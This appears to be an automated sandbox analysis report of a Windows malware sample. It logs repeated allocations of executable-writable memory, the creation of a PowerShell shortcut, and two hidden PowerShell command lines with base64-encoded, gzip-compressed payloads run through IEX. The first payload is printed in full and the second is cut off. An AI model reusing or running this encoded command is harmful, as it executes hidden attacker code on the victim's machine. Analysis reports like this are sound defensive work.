NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02650000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02466000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x024c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026be000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02700000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02701000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02702000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02703000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 31, 2023, 12:32 p.m.	process_identifier: 2148 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02704000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAFYAbwB5AEwAdwBiAGkANgB0ADEASwAxAHYASQBNAEMAawBUAGMAMQA1AHEAUgBTAEMASwBNAGkAQwBNAGkATABpAEcAZgAzAHYANQA4AEcATgBaAHUAOQBtADcAMQAzAHEAKwA2ADEAaQBuAEsAWQBtAGUANQArACsAcABuAHUAbgBrAFoASAA2AGEAMgBlAHgAcQA2AGQAeQBxAEcARABzAE4AcwBKAGkAaABNADMARABMAEMANwBXAHUAMQA2AGEAMwBuAEkAVABaAE0AUQBlADgAQwArADEAbQB2AEwATABMAEQAVABjAHEAawBjAHYASwA1AFEAKwBoAHIARgBvAGYAMQBxAE8AVQA2AE0AawBnAFQANwB1ADMAWQAxAHQAbQBKAHIAaQB6AFcAdQA5ADEAYgA4AHUAZwAyAGQAegBFAGMAdAByAEgAbwBwAE4AeQBJAG4AaQAxAEgAegA2AHEAcAAyAFYAVQAxAGwAUQBXAEkAdAAwAFcAdABnAHAAZQA0AGUAdgBXADUAUgB1AGcANgBkAEIAQQB3ADEAbgBzAGsAbwBZAHMASwB0ADUAUQBZAHYAWAA3ADcAUQBXAFIAeQBqAEkARAAyADkAdAAzAG0AVQBrAGsAbQBDAHQAZwB2AGYAUgBVAG0AagBpAFgAMwBEAHAAbQBzAFUAbwA5AHYASAB4AFEAYgBaAEsAZgBZADMAZAB2ADMAYQA1AHYAMQB3AFkAZgBuAG4AYgBRAFYAdAAyAFcAdAB3AGkAZwB5AGMAYwBrADAASwBiAGEAdgAwAG8ASwAxAEgAdgBwAHMAMgA2AG4ALwA5AFYAVwA4ACsAMwAzAFoAZQAyAHUAdwB1AHMALwB5AGsAVQBkAGUATABKAEUAWABiAHQAdQBQADcAOQBTAGIAMgB2AFYAawBhAE4ASQBvAEkATgBlAHEAeQBhADgAZABoAEUAaQA3AFQAOQB0AFEATgBpAEwAdQAyAFcAYQBGAFgASwB2AEQAeQBDAFgAdQA5AGUAZgBaAHMARgBWAG4AZwB4ACsAKwBkAEwATABXAGUAWgBCAHAAMQBHAEkANgBCAEcALwBMAEUAWQBiADIARgBQAFoAZgAyAG4AbAA5AGUAcwBLADkAdgBhAEwAUQBzAFMATgAwAHQAYQBvAHQAQgBpAHUASQB3ADAAbABHADgAZAAyADIAVQB0AEEAVQByAGMASAB5AGsAbwBTAFcASQAxAFIATQA0AHcAbQBCAFYAYgB3AEsASQBHAEsAVgBaAEgARwBBAFgATABDAEMAMwBEAHoAMwBVAHUAQQA0AHkAMwAyACsAQgAzAHUAYwAvADEAZgB2AFMAVQBGAEIAKwBJAGYAZABQAGgAUgByAHYAaABXAEQAWABPAEkAMgBiAHIAWABOAE0ALwBBAGsAZABjAGgAVQAzAEoAMwBYAGcAegBpAC8AbwAzAHcAVgBYAEUAMwA2AC8AQgBGAGkAegA5AHIAMwAyAFEAYQBnADYAeQBFAGMAcgBLADAAVwB2AEsAZgBEADcATABsAFoAcgBWADEAZgBQADEAUgBDAEIAUAA0ADEAeABtAEwAaQBWADMAQQBPAEcAdAB6AEEAWgBRAEYAaABwAEcAQgBmAGwAYwBSAHAAeABoAHAAbwB2AFAAOAA3AG4AWgBQAFkAaQBtAGIAUgArAHEANgBoAHoAawBUAHIATABuAEkANwBuAGgATwBNAEIAZQA1ADYARQByAHYATgBTAHUAMgByAFcAegB0AEYAVAB6AHIAOAB1AE0AdABkADMAVQBGAHkAdQAvAHoANABiAEcATABSADAAQQA4AFEAVQBnAGIAVgAxADcAVQB2AEEATgB6ADQANgBNADcAVAAwAFUAYwBWAEgAKwA3AEoATgBBAFoAeQBOACsAbgBrAEIATwBjAHkAWgBuAFgAcABKADYAUABPAHYAWQB1AHoAVwBUAGQAOQBrAHEAUgBNADQAMABvAFoAegBUAHcAQQBWAGgARQBUAHoAWgB6AEMAbgBNADIAegBVAHgAVQBCAEcAVwArAEQAdgA5AEEANQBoAGUAcgAyAEUATgBFAE8AWAAzAGUAZgBVAEsAaQA3AFcAeQAvAGMAeQBsAG0AbgBmAFMAcABJAFcATgBzADQAZwB6ACsAMABXAHAAaQBQAEwAUgAwADQATABJADQAUABFAFAAUwArAFIAVwBSAHAAVwB3AC8AbwBQAHUASABMAG0AcAA2ADUAdABKAGUAbABGADMAVQB2AHoAQQAwAHIAUABwAHUAawB3AGcASQB6AEoAYgBEAGgAZABvAE0ASABRAEkAMgBTADcAbABsACsAeQAwAHMASQBFADEAMABGAFUAbwBiAHUAcgBDADQAVAA2AGgANQB6AFEAbAB1ADkARAB5AG8ARwBtAFAAWgB3AEoAegBKAFIAYwA2AEcAawBaAE0ANwBIAFQAKwB2AGYANABhAEwAWgAxAGwASQByAGIAeQBFAGQAYgAyAEYAMQBWAEkAYwA2ADMAVgBsAEIAegB6AGgAbABWAGgAWgB1ADEAUQBrADcAOQBQADgAQwArADUATQBrAHAASwBVAHEAdQBMAGkAUwA5AEEAdwAwAEIAbwBQAHQAaAAyAHMASQBtAGIAcAB4AEMAWABhAHUAMwBmAGcAbQA4AC8AdwAzAGUAegB5AFgAbQBKADUAaAAwAGoATQA0AEgAMgBhAGcAUwA4AFoAawBxADAAagBKAGQAcgB2AGUAdgBkAG4AbQA5AFAATAB3AHgAVwBmAEUAVwBwADgAQQBaAEYANABkAGIAeQBrAHAAUQByADYAdABYAFIAYQB4AFIASgAvAHIAWgBUAGkAegBrAGoAZABxAEwAZQBYAGIAUABDAFQAdQBCAE4AZQBEAFoAdwAwAFAAcwBPAEYAYQBTAGgAbABwAEUAYQBaAEwATgBaAG8AOQBqAEEAUgA4AHUAUgBiAFgAUABkAEwATQA4AEUAegBPAEQAdwBnAGsATwBoADMAMwBIAEgAYwA4AHUAeABmADEAagArAE4AVABKAHQAdAAyAE8ARQA0AGwANwBCAGUAYQBTAHoAegBzAGgAWQBjAFEAOQBRAHcAcAAzAHUANQBEAHIAcgBkAHoAQgBXAGMAOQBKAFgAbAAzAGsAbgBjAFYATQA1AEQANAB2AGUASwA0AHIAVABCAEsAdQAzAEMAKwBJAGUANAByAGIAMABZAE0AUQB4AHAALwBFAFAAUgAwAE8AUQBhADcAZgBpAHcASQBxAGQANwBxAEkASABmAGIAUQBUAEwASgB6AEkAdQAwAGoAYQAzAFUAbwBSAHAATQBiAEgAZQAvAHcAawAwAEsAUgBKAG0AeQBrADYASQBFAGoATABUAG8AcQBOADEAUwBPAGQAdwBYADQAQgBIADcAcABoAEsARABoAEQAagB6ADYAdwBlADkATQBRADgATQBlAEoARAB1AGgAOQBCAGQAUgAwAHMANABPAGgAawBOAFIARwBCAFkANgBRAGQASgBpAG8AZQBRADIAbgB1AEsANwArAE8AZwBUADQALwBtAHgAMgBQAFYAQgBYAHUAawBDAEoAdwBlADkAawBMAFYAdQB6AHoAbgBZAE0AeQA2ADMAWgA0AHAAVQBDAEUAOABLAEQAegBaADIAMgBYAFQAVgBGAFIAUQBwAFAASgBBAGIAcwBSAGMAegB1AHUANABjAGQAZQBQAFEAMABUAHQAegBmADIALwBOADcARQBHAFEAVgAvAFoAMQA1ADUAQQA3AFoAdgBJADQATgBOAEkAbgBZAG0AeAB0AHUAMABVAFIAOQBIAFIAeABJAHgANABrAE8AMABvAG4AcwAyAEUAdgB0AGcAbwA2AGsAbAB5ADAAbwBKAFoAcABxAFgAYwBvAHoAVgBmAEQAQQBRAHQAagBOAGoAMwBnAHUAcQA0AFYARAB0AGoAMQBCAFkATQBaAGcAZAAyAEEAbABtAFgAdwB3AGIAcgBuAG4AagB4AEUAagBFAGQAVAA1AFcAZwBUAGwARwBRAFgAcwBlAGkASwB4AFgAagBVAGMAMABGADMAUAA1AFUASgBtAEcAZABZAFgANQA5ADQAYwB3ADIAUQBxAG8AeABHAEsAdQB5AHEAbwB4AHAANAA5AE0AaQBZADkAeQBOAEQANwBRAHgATgBlAHEAeQBPAHUANABUAGEAUAA2AHEAMgBNAHMAaQB5AFUATwBmADMAcwBiAG4AYQBPAHcAawB4AHAAaAA3AHAAegB2AGgAUgA3ADcAUABVAE0AYwA0AG4AZAAyAHYANwBhAFQAKwA0AGkAZQBjADMALwBXAFAAMwBKAGwAagBtAGEAKwBKAHoAWgAyAEIAcwB2AE0AegBlAGMAZgB5AEcAVgBsAHkAVgBwAFgAaQB6AFkAOAAvAEoAagBzAE4AUABPADcAYQBzAGQANQB4AEgASQB4AC8AUQBaAGsAYwBaADYAeAA1AEYAVAAvAEIASQBOAHQAVABEADQAagBTAC8AWABoAGgAZQBmADYAegA2AGkAZwBGADQAUwBOAFYAMwBSAGcAYQBMAHkAMQBQADgAZgBzAHgAegBJAG0ASgB6ADMARwBKAHkAVAA2AGEAMQB0AFMANgBzAFoAWQBVAHYAdQB0AEcAVABSADUARwBhAHIAOAB5AFkANwBZAEEAMgBUAEcAMgBxAGUAaAByAFAAcQB3AHAAdgBxAFAAZAAzAE4AagBuAGcAagBmAE4AZQB6AHUAMQBHAHQAagBuAG4ATgBKAC8AagBUAGMAMQBqAHcATgA3AE0AUABIAGcAeQB3ADEASwB5AGgAagA4AHAAKwBtAFEANABoAFQAVwBMAE0AUwBuAFoAVwBPAFgAWgBhAEQAbwBrAFYAWABaAHUAVABQAEwANwByAFcARwBXAGUAeQBKAEYAbwB6AHgARwA0AC8AeQBSAG0AZgBjAFoARABaADkAegBCAGoANgBjAGEAYQBEAFgAOABjAEYASAA5AGQANwBWADIATABrAHkATwBYAGoATQB3AGoAdgBNAGQAVwA4AHcAVgBsAGYANQBsAE4ARgBrAGgAaQBhADAAawBXAEUANgA4AG8AUQBqAG0AYwBYAE0AWgBqAGcAVgBWADMAbABTAEkAVQB3AHoARQBqAFMAdgBNADIATQBvAFYAVwBFAFAASwA4AGEAYwBtAEgATgAyAEwAUwBwAHMASABqAEwAZwB2ADYAaQB0AEYARQAvAHoASwBOAEcAZwB1ADUASAA0ADYAUwA1AGsAaABwAHcAZwB4AFkARgBpAGoAKwA2AGUASwBKAHEAWgBzAGEARgA2ADEARwBrAGgAMwBMAG0AOAAwAHAAdQBIAG4ANQBZAGIAYgBTADcAYgA5ACsAcAB5ADcAVQA2ADIARgBEAG0ATABrAEMAQwBNAHUAbQBqAGMARQBaAGoAcABMAEIAaABNAEIAdQBhAG4ASgA0AHYAeABOAHYAcgBnAGMAYgBxAGEAUQBTAHgANgAvAGcAYgBpACsAQQBnAHgATABjAEcAegBFAFEAbABOAFEAbAAwAG4AUAAwAEMATQBKAGMATwBkAEwATgBHAFEATAAvAHUAbwBzAEUAYwB4ADYANwBEAEoAaABvAFEAYwBzAFkAVwBKAEoAQwArAG0AdQA5AHcANQAzAGsAVwBaAE0AcgB1ADMAVgBwADYAWQAwAFoARABqAEMAeAA3AGQATQBOAEkAdQAvAFcAdwBUAHIAQwBZAHkAUABqAFUAegBPAFYAcwB4AEoAMAA4AGIAZgB0AG0AUgB2AE4AWABEAFEAMQBtADcAbABtAEUATQAzAGMAagB4AFcARgA3AHgALwA4AEwASwB3AGEAMgBmAFkAdQBmADYAQgBGAFUASgB5AGwAMAAxAGYAWABQAFQATABOAHUARQA4ADgASQB6AHoATAB4AFUAWABkADIANwAxADkAdgBGAEEAWgBRAFIAOQAyAFcAaABxADAAcgBoADMAbgBwAFgANABIADcAWABLAGMAbABXAG4ASwB3AHQASAB3AG8AZgBkAEQAdQBYAHUANABvAEwAWQArADcAYwBzADQAeABEAHQANQBSAG8ATgBEADUAdQBzAHoAMABVAEIAOABpAEgARgBoAFMAYQAxAEUAdQBGAEoAMwAwAC8AdABNAHMAdQA2AHoAZgB0AEQAdgBSADgAcAAwADcAcwBCAFcANAB5AEUANABiAEUAMwBZAGUAagBKAHYAYQAyAEUAVgBxAHIAawAwACsATABiAEwAbQBzAE8AcABHAHoAaAA1AGUARwA3AEwATAB4AHkANQBjADUAdQBOAGQANgBZADEAQgBDAHcAUwBwAGQAdAB6AEQAOABRAE8AQQA0AFgAdgA1ADMAOABXAGIAdAB6ADAAbQBoAHcANgBoAG8AbgBKAFcAMQB5AGkANwBzAEgAWQBvAGYAVgB2AHoASwBTAHYAUABNAGUANQB3AEYAVwAvAFIALwBwAFAANABuAGsALwArAGQAMQBKAEsAMgBxAG8AMQA3AEkANgAwAEMAOQBEAEYAVAB6AFYAcgA5AGEANgAwAG0ATAByAEYAMwA4ADQAbAA3AGgASQA4AFUAdABNAFAANgBWAGMAdwBsAHEAUgBXAG4AdAA1AHQAdwBBAFYAOAAwADEAUgBYAGQAdQBMAGEAYQBtAE0AagBPAHMARwBzAEwAKwA0ADcAZABnAG4AdABrAFEAdAB6AEIAWgAwADIAOAB5AHMAcgA3AEcAdgB2AHgAcABmAFkATgB5AHkAMwAzAEoAUAB3AE4AMAA1AEMATgBvAE4ATwArAEgAWQBZAEwAaQBGAEUARQByAFYAZQBwAHYAbABKADAARQBZAEQANQBmAHcARAA5AGwAcgBMAE4AQQBnADQAQQBBAEEAPQA9ACIAKQApADsASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsACgA=

cmdline

powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQBBAEEAQQBBAEEAQQBBAEEAQQBLADEAWABiAFgATwBpAHkAaABMACsASABIADgARgBIADEASwBsAFYAbwB5AEwAdwBiAGkANgB0ADEASwAxAHYASQBNAEMAawBUAGMAMQA1AHEAUgBTAEMASwBNAGkAQwBNAGkATABpAEcAZgAzAHYANQA4AEcATgBaAHUAOQBtADcAMQAzAHEAKwA2ADEAaQBuAEsAWQBtAGUANQArACsAcABuAHUAbgBrAFoASAA2AGEAMgBlAHgAcQA2AGQAeQBxAEcARABzAE4AcwBKAGkAaABNADMARABMAEMANwBXAHUAMQA2AGEAMwBuAEkAVABaAE0AUQBlADgAQwArADEAbQB2AEwATABMAEQAVABjAHEAawBjAHYASwA1AFEAKwBoAHIARgBvAGYAMQBxAE8AVQA2AE0AawBnAFQANwB1ADMAWQAxAHQAbQBKAHIAaQB6AFcAdQA5ADEAYgA4AHUAZwAyAGQAegBFAGMAdAByAEgAbwBwAE4AeQBJAG4AaQAxAEgAegA2AHEAcAAyAFYAVQAxAGwAUQBXAEkAdAAwAFcAdABnAHAAZQA0AGUAdgBXADUAUgB1AGcANgBkAEIAQQB3ADEAbgBzAGsAbwBZAHMASwB0ADUAUQBZAHYAWAA3ADcAUQBXAFIAeQBqAEkARAAyADkAdAAzAG0AVQBrAGsAbQBDAHQAZwB2AGYAUgBVAG0AagBpAFgAMwBEAHAAbQBzAFUAbwA5AHYASAB4AFEAYgBaAEsAZgBZADMAZAB2ADMAYQA1AHYAMQB3AFkAZgBuAG4AYgBRAFYAdAAyAFcAdAB3AGkAZwB5AGMAYwBrADAASwBiAGEAdgAwAG8ASwAxAEgAdgBwAHMAMgA2AG4ALwA5AFYAVwA4ACsAMwAzAFoAZQAyAHUAdwB1AHMALwB5AGsAVQBkAGUATABKAEUAWABiAHQAdQBQADcAOQBTAGIAMgB2AFYAawBhAE4ASQBvAEkATgBlAHEAeQBhADgAZABoAEUAaQA3AFQAOQB0AFEATgBpAEwAdQAyAFcAYQBGAFgASwB2AEQAeQBDAFgAdQA5AGUAZgBaAHMARgBWAG4AZwB4ACsAKwBkAEwATABXAGUAWgBCAHAAMQBHAEkANgBCAEcALwBMAEUAWQBiADIARgBQAFoAZgAyAG4AbAA5AGUAcwBLADkAdgBhAEwAUQBzAFMATgAwAHQAYQBvAHQAQgBpAHUASQB3ADAAbABHADgAZAAyADIAVQB0AEEAVQByAGMASAB5AGsAbwBTAFcASQAxAFIATQA0AHcAbQBCAFYAYgB3AEsASQBHAEsAVgBaAEgARwBBAFgATABDAEMAMwBEAHoAMwBVAHUAQQA0AHkAMwAyACsAQgAzAHUAYwAvADEAZgB2AFMAVQBGAEIAKwBJAGYAZABQAGgAUgByAHYAaABXAEQAWABPAEkAMgBiAHIAWABOAE0ALwBBAGsAZABjAGgAVQAzAEoAMwBYAGcAegBpAC8AbwAzAHcAVgBYAEUAMwA2AC8AQgBGAGkAegA5AHIAMwAyAFEAYQBnADYAeQBFAGMAcgBLADAAVwB2AEsAZgBEADcATABsAFoAcgBWADEAZgBQADEAUgBDAEIAUAA0ADEAeABtAEwAaQBWADMAQQBPAEcAdAB6AEEAWgBRAEYAaABwAEcAQgBmAGwAYwBSAHAAeABoAHAAbwB2AFAAOAA3AG4AWgBQAFkAaQBtAGIAUgArAHEANgBoAHoAawBUAHIATABuAEkANwBuAGgATwBNAEIAZQA1ADYARQByAHYATgBTAHUAMgByAFcAegB0AEYAVAB6AHIAOAB1AE0AdABkADMAVQBGAHkAdQAvAHoANABiAEcATABSADAAQQA4AFEAVQBnAGIAVgAxADcAVQB2AEEATgB6ADQANgBNADcAVAAwAFUAYwBWAEgAKwA3AEoATgBBAFoAeQBOACsAbgBrAEIATwBjAHkAWgBuAFgAcABKADYAUABPAHYAWQB1AHoAVwBUAGQAOQBrAHEAUgBNADQAMABvAFoAegBUAHcAQQBWAGgARQBUAHoAWgB6AEMAbgBNADIAegBVAHgAVQBCAEcAVwArAEQAdgA5AEEANQBoAGUAcgAyAEUATgBFAE8AWAAzAGUAZgBVAEsAaQA3AFcAeQAvAGMAeQBsAG0AbgBmAFMAcABJAFcATgBzADQAZwB6ACsAMABXAHAAaQBQAEwAUgAwADQATABJADQAUABFAFAAUwArAFIAVwBSAHAAVwB3AC8AbwBQAHUASABMAG0AcAA2ADUAdABKAGUAbABGADMAVQB2AHoAQQAwAHIAUABwAHUAawB3AGcASQB6AEoAYgBEAGgAZABvAE0ASABRAEkAMgBTADcAbABsACsAeQAwAHMASQBFADEAMABGAFUAbwBiAHUAcgBDADQAVAA2AGgANQB6AFEAbAB1ADkARAB5AG8ARwBtAFAAWgB3AEoAegBKAFIAYwA2AEcAawBaAE0ANwBIAFQAKwB2AGYANABhAEwAWgAxAGwASQByAGIAeQBFAGQAYgAyAEYAMQBWAEkAYwA2ADMAVgBsAEIAegB6AGgAbABWAGgAWgB1ADEAUQBrADcAOQBQADgAQwArADUATQBrAHAASwBVAHEAdQBMAGkAUwA5AEEAdwAwAEIAbwBQAHQAaAAyAHMASQBtAGIAcAB4AEMAWABhAHUAMwBmAGcAbQA4AC8AdwAzAGUAegB5AFgAbQBKADUAaAAwAGoATQA0AEgAMg